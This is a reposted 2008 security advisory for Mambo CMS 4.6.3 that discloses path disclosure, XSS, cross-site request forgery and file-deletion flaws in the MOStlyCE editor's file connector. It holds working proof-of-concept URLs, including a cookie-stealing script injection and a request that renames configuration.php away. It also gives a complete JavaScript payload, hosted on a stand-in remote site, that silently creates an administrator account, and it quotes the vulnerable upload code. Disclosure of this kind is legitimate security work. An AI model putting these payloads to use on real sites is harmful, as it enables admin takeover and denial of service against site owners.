Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18961
HistoryJan 29, 2008 - 12:00 a.m.

Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS

2008-01-2900:00:00
vulners.com
67
mambo
path disclosure
xss
xsrf
dos
remote
browser
exploitation
mysql
database
image manager
remote attacker
denial of service

########################## WwW.BugReport.ir #########################

AmnPardaz Security Research Team

Title: Mambo Vulnerabilities

Vendor: http://mamboserver.com

Bugs: Path Disclosure, XSS , XSRF, DOS

Vulnerable Version:4.6.3 (prior versions also may be affected)

Exploitation: Remote with browser

Fix Available: No!

################################################################

####################

  • Description:
    ####################

Mambo is an, open source, modular, web content management system
(CMS), written in Php with a MySql database in backend.

####################

  • Vulnerability:
    ####################

±-> Path Disclosure
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=RenameFile

±-> XSS
POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script>alert(document.cookie)</script>

±-> XSRF (the exploit creates an admin account)
POC:http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=<script type=text/javascript
src=http://somewhere/test.js></script>

content of http://somewhere/test.js

/*
Set desiered user, pass, email and victims url then upload the script
somewhere on the web
*/

window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = '[email protected]';
var param = {

name: user,
username: user,
email: email,
password: pass,
password2: pass,
gid: gid,
block: 0,
option: 'com_users',
task: 'save',
sendEmail: 0

};

var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';

for (var i in param)
{
try
{ // ie
var input = document.createElement('<input name="'+i+'">');
}
catch(e)
{ // other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
location.replace(url);
}

±-> DOS
"mostlyce component" Image Manager note from mambo 4.6.3:
Important: In order to utilize the Image Manager functionality you
must create the folder structure shown below in your document root
folder.
Not your Mambo root, your document root! For this installation your
document root is [something].
You can create this structure manually or extract the UserFiles.zip
file included with MOStlyCE at that location.
You can find the UserFiles.zip file at /mambots/editors/mostlyce.

If an administrator follows up the above instruction,its possible for
a remote attacker to remove any file from the remote server for
example the main configuration file, which could result in remote
denial of service!
The impact of the vulnerability increases when the administrator
doesnt remove "installation" folder (its common to rename it to
something predictable such as "_installation"),
in such a condition its possible for a remote attacker to delete
configuration.php and install a new version of mambo on the victim
server using remote database!

Code Snippet:

/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/Commands/FileUpload.php
#45-60
function run() {
//If using CGI Upload script, get file info and insert into $_FILE array
if (
(sizeof($_FILES)==0) &&
isset($_GET['file']) &&
isset($_GET['file']['NewFile']) &&
is_array($_GET['file']['NewFile'])
) {
if
(isset($_GET['file']['NewFile']['name'])&&$_GET['file']['NewFile']['size']&&$_GET['file']['NewFile']['tmp_name'])
{
$_FILES['NewFile']['name']=basename(str_replace("\\","/",$_GET['file']['NewFile']['name']));
$_FILES['NewFile']['size']=$_GET['file']['NewFile']['size'];
$_FILES['NewFile']['tmp_name']=$_GET['file']['NewFile']['tmp_name'];
} else {
$disp="202,'Incomplete file information from upload CGI'";
}
}
.
.
.
#163-178
//Upload file
if (is_uploaded_file($_FILES['NewFile']['tmp_name'])) {
if
(move_uploaded_file($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext")))
{
chmod(($this->real_cwd."/$filename.$ext"),0777);
$disp="0";
} else {
$disp="202,'Failed to upload file, internal error…'";
}
} else {
if
(rename($_FILES['NewFile']['tmp_name'],($this->real_cwd."/$filename.$ext")))
{
chmod(($this->real_cwd."/$filename.$ext"),0777);
$disp="0";
} else {
$disp="202,'Failed to upload file, internal error…'";
}
}
.
.
.

POC:
http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&amp;file=a&amp;file[NewFile][name]=abc.gif&amp;file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&amp;file[NewFile][size]=1&amp;CurrentFolder=

####################